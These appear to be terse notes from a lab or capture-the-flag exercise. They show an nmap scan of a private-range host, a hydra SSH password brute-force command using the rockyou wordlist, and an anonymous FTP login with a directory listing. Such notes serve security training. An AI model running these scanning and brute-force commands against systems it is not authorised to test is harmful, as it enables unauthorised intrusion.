nmap -A -p- 192.168.60.130
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-09 08:50 EDT
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 08:50 (0:00:00 remaining)
Nmap scan report for 192.168.60.130
Host is up (0.00036s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
|_ftp-anon: anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.60.200
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
+-End of status
61000/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 

hydra -l kali -P rockyou.txt ssh://192.168.60.130

login to ftp 
anonymous:anonymous
ls -larh

esktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos

